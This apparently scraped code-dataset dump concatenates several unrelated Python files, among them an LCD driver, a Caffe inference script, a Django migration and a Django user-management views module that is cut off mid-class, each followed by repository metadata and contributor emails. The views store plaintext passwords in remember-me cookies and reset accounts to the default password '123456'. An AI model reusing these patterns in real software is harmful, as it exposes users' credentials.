    resampler.SetDefaultPixelValue(100)
    resampler.SetTransform(outTx)
    out = resampler.Execute(moving)
    simg1 = sitk.Cast(sitk.RescaleIntensity(fixed), sitk.sitkUInt8)
    simg2 = sitk.Cast(sitk.RescaleIntensity(out), sitk.sitkUInt8)
    cimg = sitk.Compose(simg1, simg2, simg1//2.+simg2//2.)
    nda = sitk.GetArrayViewFromImage(cimg)
    my_pil = Image.fromarray(nda)
    my_pil.show()
    # sitk.Show(cimg, "ImageRegistration1 Composition")
| [
"fandig27@gmail.com"
] | fandig27@gmail.com |
4cf44b39fa07b6be387b485b0852216579c88b72 | 6cd3060abd6c7467715f73f276d2f4d5f9f5175c | /backend/apps/api/offers/__init__.py | e94327a9d2bba8a28321b8930fb73db377105e1f | [] | no_license | Digitize-me/gpb-corporate-application | 3e2ef645d34802621badc630ab445d15428aeb5e | d59d146e131b49a670e3ac4752ea91aa7e148e51 | refs/heads/master | 2022-11-07T16:39:39.876126 | 2020-06-20T22:53:22 | 2020-06-20T22:53:22 | 273,590,113 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | default_app_config = "apps.api.offers.apps.OffersConfig"
| [
"wsxxx2016@yandex.ru"
] | wsxxx2016@yandex.ru |
b74694eff0fe4b7585e4284a0e8af80807315e0a | 9a88de8e9295db765889626d7345976fc385964e | /4thSec/q39.py | 43bacb8c75cdca9e0443bcdb557da64f3ee72eb5 | [] | no_license | rhi222/100fungo | cbf0fef420afdad8f2754bc799ac7b4f66624fc3 | 3d6c5fed9f6533b2f78e877347220090c985d3be | refs/heads/master | 2021-01-12T15:53:45.179887 | 2017-05-05T09:45:02 | 2017-05-05T09:45:02 | 71,901,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# 39.py
from q30 import tabbed_str_to_dict
from q36 import get_frequency
from pprint import pprint
from collections import defaultdict
# https://docs.python.jp/3/library/collections.html#collections.defaultdict
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
import numpy as np
if __name__ == '__main__':
    # Build the morpheme list from the MeCab-parsed text of "neko.txt".
    with open('neko.txt.mecab', encoding='utf-8') as f:
        morphemes = [tabbed_str_to_dict(line) for line in f]
    # Surface-form -> occurrence-count mapping.
    frequency = get_frequency([morpheme['surface'] for morpheme in morphemes])
    # Frequencies in descending order; rank i+1 belongs to freq[i].
    # (Replaces the original double sort: sorted(items) -> dict -> sort.)
    freq = sorted(frequency.values(), reverse=True)
    rank = list(range(1, len(freq) + 1))
    fig = plt.figure(figsize=(10, 6))
    ax3 = fig.add_subplot(133)
    # Zipf's law: frequency as a function of rank, on log-log axes.
    # The original plotted (freq, rank), contradicting the axis labels.
    ax3.plot(rank, freq)
    ax3.set_xlabel('Rank')
    ax3.set_ylabel('Frequency')
    ax3.set_title('Zipf law')
    ax3.set_xscale('log')
    ax3.set_yscale('log')
    fig.savefig('morphological_analysis.png')
    plt.show()
| [
"ryouhei222@gmail.com"
] | ryouhei222@gmail.com |
e2bcbcc8eabdb541cdd13185af9f8b4f40943c05 | 79bf34ad2894c92a8ad887404225295595313958 | /ex44d.py | 3641234825b4c46314357fee5adaa74cce562d33 | [
"MIT"
] | permissive | sogada/python | 98ac577a18d709a13ace2a56d27e675edeeb032b | 4bdad72bc2143679be6d1f8722b83cc359753ca9 | refs/heads/master | 2020-04-21T00:12:44.872044 | 2015-10-29T20:18:02 | 2015-10-29T20:18:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | class Parent(object):
    def override(self):
        # Base implementation; Child replaces this method entirely.
        print "PARENT override()"
    def implicit(self):
        # Not redefined in Child, so Child instances inherit this as-is.
        print "PARENT implicit()"
    def altered(self):
        # Child overrides this but calls back into it via super().
        print "PARENT altered()"
class Child(Parent):
    # Demonstrates two override styles: a full replacement (override) and a
    # wrapper that delegates to the parent implementation (altered).
    def override(self):
        print "CHILD override()"
    def altered(self):
        print "CHILD, BEFORE PARENT altered()"
        # Python 2 super() syntax: explicitly names the class and instance.
        super(Child, self).altered()
        print "CHILD, AFTER PARENT altered()"
dad = Parent()
son = Child()
# implicit() exists only on Parent: Child inherits it unchanged.
dad.implicit()
son.implicit()
# override() is redefined on Child, completely hiding the Parent version.
dad.override()
son.override()
# altered() is redefined on Child, but the Child version still runs the
# original Parent implementation in the middle, via super().
dad.altered()
son.altered()
| [
"alexander.liggett@gmail.com"
] | alexander.liggett@gmail.com |
5bdd168eca6ca9a05b5765cb0375fb4bd7b45dc1 | 16f0171b1aecb8d104a208df4953884a9ab97b26 | /googlenet_regression/get_regressions_batch.py | 5412aac0db52a3a1cebf4611c8f5168f70565739 | [] | no_license | gombru/LearnFromWebData | 97538dd91822a0e2a7d12084cde0d9dbf64f3c70 | 163447027c856004836abe40d9f653ec03da0702 | refs/heads/master | 2020-03-24T23:12:43.819864 | 2018-08-01T12:25:10 | 2018-08-01T12:25:10 | 143,123,717 | 13 | 7 | null | null | null | null | UTF-8 | Python | false | false | 2,341 | py | import caffe
import numpy as np
from PIL import Image
import os
caffe.set_device(0)
caffe.set_mode_gpu()
test = np.loadtxt('../../../datasets/SocialMedia/word2vec_mean_gt/test_InstaCities1M.txt', dtype=str)
# test = np.loadtxt('../../../datasets/WebVision/info/test_filelist.txt', dtype=str)
#Model name
model = 'WebVision_Inception_frozen_word2vec_tfidfweighted_divbymax_iter_460000'
#Output file
output_file_dir = '../../../datasets/SocialMedia/regression_output/' + model
if not os.path.exists(output_file_dir):
os.makedirs(output_file_dir)
output_file_path = output_file_dir + '/test.txt'
output_file = open(output_file_path, "w")
# load net
net = caffe.Net('../googlenet_regression/prototxt/deploy.prototxt', '../../../datasets/WebVision/models/saved/'+ model + '.caffemodel', caffe.TEST)
size = 227
# Reshape net
batch_size = 250 #300
net.blobs['data'].reshape(batch_size, 3, size, size)
print 'Computing ...'
count = 0
i = 0
while i < len(test):
indices = []
if i % 100 == 0:
print i
# Fill batch
for x in range(0, batch_size):
if i > len(test) - 1: break
# load image
# filename = '../../../datasets/WebVision/test_images_256/' + test[i]
filename = '../../../datasets/SocialMedia/img_resized_1M/cities_instagram/' + test[i].split(',')[0] + '.jpg'
im = Image.open(filename)
im_o = im
im = im.resize((size, size), Image.ANTIALIAS)
indices.append(test[i])
# Turn grayscale images to 3 channels
if (im.size.__len__() == 2):
im_gray = im
im = Image.new("RGB", im_gray.size)
im.paste(im_gray)
#switch to BGR and substract mean
in_ = np.array(im, dtype=np.float32)
in_ = in_[:,:,::-1]
in_ -= np.array((104, 117, 123))
in_ = in_.transpose((2,0,1))
net.blobs['data'].data[x,] = in_
i += 1
# run net and take scores
net.forward()
# Save results for each batch element
for x in range(0,len(indices)):
topic_probs = net.blobs['probs'].data[x]
topic_probs_str = ''
for t in topic_probs:
topic_probs_str = topic_probs_str + ',' + str(t)
output_file.write(indices[x].split(',')[0] + topic_probs_str + '\n')
output_file.close()
print "DONE"
print output_file_path
| [
"raulgombru@gmail.com"
] | raulgombru@gmail.com |
7b2c7f166d834ca3fb1cae9d6917b6f754616c21 | e5caec1d30321442d4db893a24edadcaf0b11046 | /blog/migrations/0004_all_ks_join.py | 87edb04f5ebbcc92d682041ebef2c7257a8423a8 | [] | no_license | cqcum6er/my-first-blog | 6e6002f2570c8cd65d20bb9e66d9f2fc75450e7c | ab4f6bc2ee6cd94fff6025b00539473d92889dce | refs/heads/master | 2020-05-21T04:40:33.390634 | 2019-03-16T01:14:35 | 2019-03-16T01:14:35 | 36,615,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,832 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated migration: creates the all_ks_join table holding one
    # row of per-symbol stock metrics per day.
    # NOTE(review): the b'...' byte-string defaults are a Python 2
    # makemigrations artifact; DateField(default=b'2018-06-17') in
    # particular looks suspect - confirm before reusing this schema.
    dependencies = [
        ('blog', '0003_auto_20180617_1227'),
    ]
    operations = [
        migrations.CreateModel(
            name='all_ks_join',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('Day', models.DateField(default=b'2018-06-17')),
                ('Symbol', models.CharField(default=b'N/A', max_length=20)),
                # All metrics are stored as free-form text, 'N/A' when absent.
                ('LastPrice', models.CharField(default=b'N/A', max_length=30)),
                ('FiftyTwoWkChg', models.CharField(default=b'N/A', max_length=30)),
                ('FiftyTwoWkHi', models.CharField(default=b'N/A', max_length=30)),
                ('FiftyTwoWkLo', models.CharField(default=b'N/A', max_length=30)),
                ('DivYild', models.CharField(default=b'N/A', max_length=30)),
                ('TrailPE', models.CharField(default=b'N/A', max_length=30)),
                ('ForwardPE', models.CharField(default=b'N/A', max_length=30)),
                ('PEG_Ratio', models.CharField(default=b'N/A', max_length=30)),
                ('PpS', models.CharField(default=b'N/A', max_length=30)),
                ('PpB', models.CharField(default=b'N/A', max_length=30)),
                ('Market_Cap', models.CharField(default=b'N/A', max_length=30)),
                ('Free_Cash_Flow', models.CharField(default=b'N/A', max_length=30)),
                ('Market_per_CashFlow', models.CharField(default=b'N/A', max_length=30)),
                ('Enterprise_per_EBITDA', models.CharField(default=b'N/A', max_length=30)),
                ('Name', models.CharField(default=b'N/A', max_length=50)),
            ],
        ),
    ]
| [
"ericsun1221@yahoo.com"
] | ericsun1221@yahoo.com |
da8e583410219e642e0741762147c28e7668e431 | dd916f3c772aa40e19764e47f6ebfc3eff28f8a7 | /lcd.py | 548a699bf551582ffbaa981529cf4e92c29dfccb | [] | no_license | StefanTobler/LCD-Countdown | 955b61490c8f1571ff0947cff2ff64cbf5711462 | 359eda59197af8ce4ac1290b565d365e105bdbea | refs/heads/master | 2021-09-08T09:34:32.355809 | 2021-08-29T18:44:36 | 2021-08-29T18:44:36 | 176,606,300 | 0 | 0 | null | 2021-08-29T18:44:37 | 2019-03-19T22:10:21 | Python | UTF-8 | Python | false | false | 4,729 | py | #!/usr/bin/python
#--------------------------------------
# ___ ___ _ ____
# / _ \/ _ \(_) __/__ __ __
# / , _/ ___/ /\ \/ _ \/ // /
# /_/|_/_/ /_/___/ .__/\_, /
# /_/ /___/
#
# lcd_16x2.py
# 16x2 LCD Test Script
#
# Author : Matt Hawkins
# Date : 06/04/2015
#
# http://www.raspberrypi-spy.co.uk/
#
# Copyright 2015 Matt Hawkins
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#--------------------------------------
# The wiring for the LCD is as follows:
# 1 : GND
# 2 : 5V
# 3 : Contrast (0-5V)*
# 4 : RS (Register Select)
# 5 : R/W (Read Write) - GROUND THIS PIN
# 6 : Enable or Strobe
# 7 : Data Bit 0 - NOT USED
# 8 : Data Bit 1 - NOT USED
# 9 : Data Bit 2 - NOT USED
# 10: Data Bit 3 - NOT USED
# 11: Data Bit 4
# 12: Data Bit 5
# 13: Data Bit 6
# 14: Data Bit 7
# 15: LCD Backlight +5V**
# 16: LCD Backlight GND
#import
import RPi.GPIO as GPIO
import time
# Define GPIO to LCD mapping (BCM pin numbers, 4-bit data bus)
LCD_RS = 26
LCD_E  = 19
LCD_D4 = 13
LCD_D5 = 6
LCD_D6 = 5
LCD_D7 = 11
# Define some device constants
LCD_WIDTH = 16    # Maximum characters per line
LCD_CHR = True    # RS high: byte is character data
LCD_CMD = False   # RS low: byte is a command
LCD_LINE_1 = 0x80 # LCD RAM address for the 1st line
LCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line
# Timing constants (seconds) for the enable-strobe pulse
E_PULSE = 0.0005
E_DELAY = 0.0005
def main():
  """Cycle a set of demo messages on the 16x2 display forever (Ctrl-C stops)."""
  # Initialise display
  lcd_init()
  while True:
    # Send some text
    lcd_string("Raspberry Pi",LCD_LINE_1)  # fixed typo: was "Rasbperry Pi"
    lcd_string("16x2 LCD Test",LCD_LINE_2)
    time.sleep(3) # 3 second delay
    # Send some text
    lcd_string("1234567890123456",LCD_LINE_1)
    lcd_string("abcdefghijklmnop",LCD_LINE_2)
    time.sleep(3) # 3 second delay
    # Send some text
    lcd_string("RaspberryPi-spy",LCD_LINE_1)
    lcd_string(".co.uk",LCD_LINE_2)
    time.sleep(3)
    # Send some text
    lcd_string("Follow me on",LCD_LINE_1)
    lcd_string("Twitter @RPiSpy",LCD_LINE_2)
    time.sleep(3)
def lcd_init():
  # Configure the GPIO pins and run the HD44780 4-bit initialisation
  # sequence; must be called once before any lcd_string/lcd_byte use.
  GPIO.setwarnings(False)
  GPIO.setmode(GPIO.BCM)       # Use BCM GPIO numbers
  GPIO.setup(LCD_E, GPIO.OUT)  # E
  GPIO.setup(LCD_RS, GPIO.OUT) # RS
  GPIO.setup(LCD_D4, GPIO.OUT) # DB4
  GPIO.setup(LCD_D5, GPIO.OUT) # DB5
  GPIO.setup(LCD_D6, GPIO.OUT) # DB6
  GPIO.setup(LCD_D7, GPIO.OUT) # DB7
  # Initialise display
  lcd_byte(0x33,LCD_CMD) # 110011 Initialise
  lcd_byte(0x32,LCD_CMD) # 110010 Initialise
  lcd_byte(0x06,LCD_CMD) # 000110 Cursor move direction
  lcd_byte(0x0C,LCD_CMD) # 001100 Display On,Cursor Off, Blink Off
  lcd_byte(0x28,LCD_CMD) # 101000 Data length, number of lines, font size
  lcd_byte(0x01,LCD_CMD) # 000001 Clear display
  time.sleep(E_DELAY)
def _write_nibble(nibble):
    # Drive the four data lines to the bits of *nibble*
    # (bit0 -> D4, bit1 -> D5, bit2 -> D6, bit3 -> D7), then latch it.
    GPIO.output(LCD_D4, nibble & 0x01 == 0x01)
    GPIO.output(LCD_D5, nibble & 0x02 == 0x02)
    GPIO.output(LCD_D6, nibble & 0x04 == 0x04)
    GPIO.output(LCD_D7, nibble & 0x08 == 0x08)
    # Toggle 'Enable' pin so the controller reads the lines
    lcd_toggle_enable()

def lcd_byte(bits, mode):
    """Send one byte to the LCD over the 4-bit interface.

    bits -- the byte to send (0-255)
    mode -- LCD_CHR (True) for character data, LCD_CMD (False) for a command

    The byte goes out high nibble first, as the HD44780 4-bit protocol
    requires.  (Refactored: the two near-identical pin-setting sections of
    the original are now a single helper.)
    """
    GPIO.output(LCD_RS, mode) # RS selects data vs. instruction register
    _write_nibble(bits >> 4)    # high bits first
    _write_nibble(bits & 0x0F)  # then low bits
def lcd_toggle_enable():
    """Strobe the Enable pin so the LCD latches the current data-pin state.

    The sleeps satisfy the controller's minimum setup/hold times; the
    exact order and delays are timing-critical — do not reorder.
    """
    # Toggle enable
    time.sleep(E_DELAY)
    GPIO.output(LCD_E, True)
    time.sleep(E_PULSE)
    GPIO.output(LCD_E, False)
    time.sleep(E_DELAY)
def lcd_string(message,line):
    """Show *message* on the display line addressed by *line*.

    The text is space-padded (and implicitly truncated) to LCD_WIDTH
    characters so the whole line is always overwritten.
    """
    # Move the cursor to the start of the requested line.
    lcd_byte(line, LCD_CMD)
    padded = message.ljust(LCD_WIDTH," ")
    for ch in padded[:LCD_WIDTH]:
        lcd_byte(ord(ch),LCD_CHR)
# Run the demo until Ctrl+C, then clear the display and release the GPIO.
if __name__ == '__main__':
  try:
    main()
  except KeyboardInterrupt:
    pass
  finally:
    # 000001 Clear display before handing the pins back.
    lcd_byte(0x01, LCD_CMD)
    lcd_string("Goodbye!",LCD_LINE_1)
    GPIO.cleanup()
| [
"toblerlstefan@gmail.com"
] | toblerlstefan@gmail.com |
9fb299e45736f5f8f6af63943be50b8b47cbe70a | 1143562f0967cc54dff14ffa6dcc96b5b8c1e0ee | /material_inventory/material_inventory/wsgi.py | ffb656dc363106aea55808cd6c7663486281eca1 | [] | no_license | emmadeyi/material_inventory | 61278a1b60390506636b543a956aeebf0cf08770 | e24ee6e470149596762d022386f9bad55ec5f802 | refs/heads/master | 2022-06-27T18:26:53.787121 | 2020-05-08T11:08:25 | 2020-05-08T11:08:25 | 258,782,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | """
WSGI config for material_inventory project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings unless the environment already set it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'material_inventory.settings')
# Module-level WSGI callable picked up by the application server.
application = get_wsgi_application()
| [
"emma.madeyi.nuetion.com"
] | emma.madeyi.nuetion.com |
d9bb751f34c8e257138dea53f4f9867ddfaf4d38 | 522ef4ac3fcf82c54cec31e494f3ad86fb2fa0cf | /apps/users/views.py | 151cdac264a1a0aa4b565f6d81d01517b973dd07 | [] | no_license | yanshigou/hydrology_mgmt | 845b124ee7fc726db83024458d222ca6edd71acf | 701149c7beebaca169ad7183434dc2004963e6cf | refs/heads/master | 2022-04-09T00:28:15.470710 | 2019-12-30T02:56:55 | 2019-12-30T02:56:55 | 209,734,620 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 44,325 | py | # -*- coding: utf-8 -*-
from django.views import View
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect, JsonResponse
from django.contrib.auth.hashers import make_password
from django.shortcuts import render
from rest_framework.views import APIView
from .forms import RegisterForm, LoginForm, UploadImageForm, UserInfoForm, PasswordForm, CompanySerializer, \
UserProfileSerializer, MessageSerializer, SystemSettingsForm
from .models import UserProfile, HistoryRecord, Message, CompanyModel, SystemSettings
from myutils.mixin_utils import LoginRequiredMixin
from myutils.utils import create_history_record, make_message, jpush_function_extra
from django.core.urlresolvers import reverse
from devices.models import DevicesInfo
from station.models import StationInfo
DEFAULT_PASSWORD = "123456"
class RegisterView2(LoginRequiredMixin, View):
    """Registration page for creating additional accounts.

    Superadmins may create accounts for any company; admins only for
    their own company and never with admin/superadmin rights.  Other
    users just get a no-permission message.
    """
    def get(self, request):
        register_form = RegisterForm()
        username = request.user
        if str(username) == "AnonymousUser":
            # Not logged in: render the page with a hint instead of redirecting.
            return render(request, 'register2.html', {'msg': '请先登录确认权限后再注册其他账号'})
        user = UserProfile.objects.get(username=username)
        if user.permission == 'superadmin':
            # Superadmin can pick any company for the new account.
            company_id = CompanyModel.objects.all()
            return render(request, 'register2.html', {
                'register_form': register_form,
                'permission': user.permission,
                "company_id": company_id
            })
        elif user.permission == 'admin':
            # Admin is locked to their own company.
            company_id = user.company.id
            return render(request, 'register2.html', {
                'register_form': register_form,
                'permission': user.permission,
                "company_id": company_id
            })
        else:
            company_id = user.company.id
            return render(request, 'register2.html', {
                'permission': user.permission,
                'msg': '您没有权限注册其他账号,请联系管理员',
                "company_id": company_id
            })
    def post(self, request):
        username = request.user.username
        user = UserProfile.objects.get(username=username)
        if (user.permission != "superadmin") and (user.permission != "admin"):
            return JsonResponse({
                'status': "fail",
                'msg': '您没有权限注册其他账号'
            })
        password = request.POST.get('password', '')
        if password == "":
            # Consistency fix: use the shared default instead of a magic literal.
            password = DEFAULT_PASSWORD
        permission = request.POST.get('permission', 'user')
        company_id = request.POST.get('company', '')
        username = request.POST.get('username', '')
        if not username or UserProfile.objects.filter(username=username):
            return JsonResponse({
                'status': "fail",
                'msg': '请检查用户名是否填写或重复'
            })
        if permission == "superadmin":
            # Nobody may create a superadmin through this page.
            return JsonResponse({
                'status': "fail",
                'msg': '您没有权限注册超级管理员'
            })
        if permission == "admin" and user.permission != "superadmin":
            return JsonResponse({
                'status': "fail",
                'msg': '您没有权限注册管理员'
            })
        user_profile = UserProfile()
        user_profile.username = username
        user_profile.password = make_password(password)
        user_profile.permission = permission
        user_profile.company_id = company_id
        user_profile.save()
        # Translate the permission code into a human-readable name for the audit trail.
        if permission == "superadmin":
            permission = "超级管理员"
        elif permission == "admin":
            permission = "管理员"
        elif permission == "user":
            permission = "用户"
        elif permission == "other":
            permission = "其他类型用户"
        make_message(username, "初始密码过于简单,请立即修改密码!", -1)
        create_history_record(user, "注册 %s 账号 %s" % (permission, username))
        return JsonResponse({
            'status': "success",
            'msg': '注册成功'
        })
class LoginView(View):
    """Web login form with optional remember-me cookies.

    NOTE(security): the remember-me feature stores the *plaintext*
    password in a cookie; consider a signed token instead.
    """
    def get(self, request):
        # Pre-fill the form from remember-me cookies when present.
        if 'username' in request.COOKIES:
            username = request.COOKIES['username']
        else:
            username = ''
        if 'password' in request.COOKIES:
            password = request.COOKIES['password']
        else:
            password = ''
        return render(request, "login.html", {'username': username, "password": password})
    def post(self, request):
        login_form = LoginForm(request.POST)
        if login_form.is_valid():
            user_name = request.POST.get('username', '')
            pass_word = request.POST.get('password', '')
            remember = request.POST.get('remember', '')
            user = authenticate(username=user_name, password=pass_word)
            if user is not None:
                if user.is_active:
                    response = HttpResponseRedirect(reverse("index"))
                    login(request, user)
                    create_history_record(user, "登录")
                    if remember == "on":
                        # Remember the credentials for one week.
                        # BUG FIX: the password cookie used to be set twice.
                        response.set_cookie('username', user_name, max_age=7 * 24 * 3600)
                        response.set_cookie('password', pass_word, max_age=7 * 24 * 3600)
                    return response
                else:
                    return render(request, 'login.html', {'msg': "用户未激活"})
            else:
                return render(request, 'login.html', {'msg': '用户名或密码错误!'})
        else:
            return render(request, 'login.html', {'login_form': login_form})
class AppLoginView(View):
    """JSON login endpoint for the mobile app (POST username/password)."""
    def post(self, request):
        try:
            name = request.POST.get('username', '')
            secret = request.POST.get('password', '')
            user = authenticate(username=name, password=secret)
            if user is None:
                # Bad credentials.
                return JsonResponse({
                    "error_no": 2,
                    "info": "username or password wrong"
                })
            if not user.is_active:
                # Account exists but is disabled.
                return JsonResponse({
                    "error_no": 3,
                    "info": "not active"
                })
            login(request, user)
            create_history_record(user, "app登录")
            return JsonResponse({
                "error_no": 0
            })
        except Exception as e:
            print(e)
            return JsonResponse({
                "error_no": -1,
                "info": str(e)
            })
# 修改密码
class ChangePassword(View):
    """Let the logged-in user change their own password."""
    def get(self, request):
        return render(request, 'change_password.html', {})
    def post(self, request):
        password_form = PasswordForm(request.POST)
        if not password_form.is_valid():
            return render(request, 'change_password.html', {'password_form': password_form})
        old_password = request.POST.get('old_password', '')
        new_password = request.POST.get('password1', '')
        confirmation = request.POST.get('password2', '')
        # Re-authenticate with the old password before allowing a change.
        user = authenticate(username=request.user.username, password=old_password)
        if not user:
            return render(request, 'change_password.html', {'msg': '请先登录后,再修改密码'})
        if new_password != confirmation:
            return render(request, 'change_password.html', {'msg': '两次密码不一致'})
        userinfo = UserProfile.objects.get(username=user)
        userinfo.password = make_password(new_password)
        userinfo.save()
        create_history_record(user, "修改密码")
        return render(request, 'change_password.html', {'msg': '密码修改成功!'})
# class AppChangePassword(View):
#
# def post(self, request):
# try:
# username = request.POST.get('username', '')
# old_password = request.POST.get('old_password', '')
# password1 = request.POST.get('password1', '')
# password2 = request.POST.get('password2', '')
# # print(username)
# # print(old_password)
# user = authenticate(username=username, password=old_password)
# print(user)
# if not user:
# return JsonResponse({
# "error_no": 1,
# "info": "login first"
# })
# if user is not None:
# if password1 == password2:
# userinfo = UserProfile.objects.get(username=user)
# userinfo.password = make_password(password1)
# userinfo.save()
# create_history_record(user, "app修改密码")
# return JsonResponse({
# "error_no": 0
# })
# else:
# return JsonResponse({
# "error_no": 1,
# "info": "password not same"
# })
# else:
# return JsonResponse({
# "error_no": 1,
# "info": "password wrong"
# })
# except Exception as e:
# print(e)
# return JsonResponse({
# "error_no": -1,
# "info": str(e)
# })
class ResetPasswordView(View):
    """Reset another account's password to DEFAULT_PASSWORD (web endpoint).

    Superadmins may reset anyone; admins may not reset another admin.
    The affected user is notified via an in-app message and a push.
    """
    def post(self, request):
        permission = request.user.permission
        if permission not in ['superadmin', 'admin']:
            return JsonResponse({
                "status": "fail",
                "msg": "您没有权限重置密码"
            })
        user_id = request.POST.get('user_id')
        userinfo = UserProfile.objects.get(id=user_id)
        if userinfo.permission == 'admin' and permission == 'admin':
            # BUG FIX: this refusal used to report status "success"
            # even though the message says permission was denied.
            return JsonResponse({
                "status": "fail",
                "msg": "您没有权限重置管理员的密码"
            })
        userinfo.password = make_password(DEFAULT_PASSWORD)
        userinfo.save()
        make_message(userinfo.username, "已重置密码,请立即修改密码!", -1)
        res = jpush_function_extra(userinfo.username, "2", "已重置密码,请立即修改密码!", "已重置密码,密码过于简单,建议立即修改密码!")
        print(res.json())
        return JsonResponse({
            "status": "success",
            "msg": "重置密码成功"
        })
class LogoutView(View):
    """Log the user out (recording it first) and return to the login page."""
    def get(self, request):
        create_history_record(request.user, "退出登录")
        logout(request)
        return HttpResponseRedirect(reverse("login"))
class LogoutApiView(View):
    """JSON logout endpoint for the app; always answers error_no 0."""
    def get(self, request):
        logout(request)
        return JsonResponse({
            "error_no": 0
        })
class Index(LoginRequiredMixin, View):
    """Landing page after login; renders the empty dashboard shell."""
    def get(self, request):
        return render(request, 'blank.html', {})
class UserInfoView(LoginRequiredMixin, View):
    """Show (GET) and update (POST) the logged-in user's own profile."""
    def get(self, request):
        return render(request, 'userinfo.html')
    # Update the current user's profile fields via UserInfoForm.
    def post(self, request):
        userinfo_form = UserInfoForm(request.POST, instance=request.user)
        if userinfo_form.is_valid():
            userinfo_form.save()
            create_history_record(request.user, "修改用户个人信息")
            return JsonResponse({"status": "success"})
        else:
            return JsonResponse({
                "status": "fail",
                "errors": userinfo_form.errors,
            })
class UploadImageView(LoginRequiredMixin, View):
    """Upload/replace the logged-in user's avatar image."""
    def get(self, request):
        return render(request, 'upload_image.html')
    def post(self, request):
        image_form = UploadImageForm(request.POST, request.FILES, instance=request.user)
        if image_form.is_valid():
            image_form.save()
            create_history_record(request.user, "修改头像")
            return HttpResponseRedirect(reverse("user_info"))
        else:
            # Invalid upload: silently bounce back to the form (no error shown).
            return HttpResponseRedirect(reverse("upload_image"))
class AllUsersView(LoginRequiredMixin, View):
    """List user accounts.

    Superadmins see every account; anyone else only the accounts
    belonging to their own company.
    """
    def get(self, request):
        if request.user.permission == 'superadmin':
            all_users = UserProfile.objects.all()
        else:
            # Fixed misspelled local (was 'compan_id') and removed debug print.
            company_id = request.user.company.id
            all_users = UserProfile.objects.filter(company_id=company_id)
        create_history_record(request.user, '查询所有用户信息')
        return render(request, 'all_users.html', {
            "all_users": all_users
        })
class DelUserView(LoginRequiredMixin, View):
    """Delete a user account (superadmin only); POST param: user_id."""
    # Delete the user identified by POST user_id.
    def post(self, request):
        permission = request.user.permission
        if permission != 'superadmin':
            return JsonResponse({"status": "fail", "quanxianbuzu": "对不起,您的权限不足!"})
        user_id = request.POST.get("user_id")
        user = UserProfile.objects.get(id=user_id)
        username = user.username
        user.delete()
        create_history_record(request.user, '删除账号 %s' % username)
        return JsonResponse({"status": "success"})
class ChangePermissionView(LoginRequiredMixin, View):
    """Edit another account's permission level (superadmin/admin only)."""
    def get(self, request, user_id):
        permission = request.user.permission
        if permission not in ['superadmin', 'admin']:
            return HttpResponseRedirect(reverse("user_info"))
        user = UserProfile.objects.get(id=user_id)
        return render(request, 'change_permission.html', {
            "user": user
        })
    def post(self, request, user_id):
        permission = request.user.permission
        if permission not in ['superadmin', 'admin']:
            return HttpResponseRedirect(reverse("user_info"))
        user = UserProfile.objects.get(id=user_id)
        # NOTE(review): the new permission value is not validated here;
        # presumably the form limits the choices — confirm.
        user.permission = request.POST.get('permission')
        user.save()
        username = user.username
        create_history_record(request.user, '修改账号 %s 权限为 %s' % (username, request.POST.get('permission')))
        return JsonResponse({"status": "success"})
class HistoryRecordView(LoginRequiredMixin, View):
    """Operation-history page.

    Superadmins get the user list rendered via all_history.html
    (presumably to pick whose history to open — see AllHistoryRecordView);
    everyone else sees their own most recent 1500 records.
    """
    def get(self, request):
        username = request.user.username
        permission = request.user.permission
        if permission == "superadmin":
            all_users = UserProfile.objects.all()[:1500]
            return render(request, 'all_history.html', {
                "all_users": all_users
            })
        history_record = HistoryRecord.objects.filter(username_id=username, r_type=True).order_by('-time')[:1500]
        create_history_record(request.user, '查询历史操作记录')
        return render(request, 'history_record.html', {
            "history_record": history_record
        })
class AllHistoryRecordView(LoginRequiredMixin, View):
    """Superadmin-only: view another user's operation history (last 1500)."""
    def get(self, request, user_name):
        # Guard clause: everyone else is sent back to their profile.
        if request.user.permission != "superadmin":
            return HttpResponseRedirect(reverse("user_info"))
        records = HistoryRecord.objects.filter(
            username_id=user_name, r_type=True).order_by('-time')[:1500]
        create_history_record(request.user, '查询 %s 的历史操作记录' % user_name)
        return render(request, 'history_record.html', {
            "history_record": records
        })
class MessageView(View):
    """List the current user's notifications and mark a single one read."""
    def get(self, request):
        all_message = Message.objects.filter(username_id=request.user.username)
        return render(request, 'message.html', {
            "all_message": all_message
        })
    def post(self, request):
        # Mark one message (POST msg_id) of the current user as read.
        msg_id = request.POST.get('msg_id', '')
        message = Message.objects.get(username_id=request.user.username, id=msg_id)
        message.has_read = True
        message.save()
        return JsonResponse({"status": "success"})
def page_not_found(request):
    """Custom 404 handler: render 404.html with the proper status code."""
    resp = render(request, '404.html', {})
    resp.status_code = 404
    return resp
def page_error(request):
    """Custom 500 handler: render 500.html with the proper status code."""
    resp = render(request, '500.html', {})
    resp.status_code = 500
    return resp
class CompanyAddView(LoginRequiredMixin, View):
    """
    Create a new company (superadmin only).

    Also creates an 'admin' account for the company whose username is
    the contact phone number and whose password is DEFAULT_PASSWORD.
    """
    def get(self, request):
        permission = request.user.permission
        print(permission)
        if permission == 'superadmin':
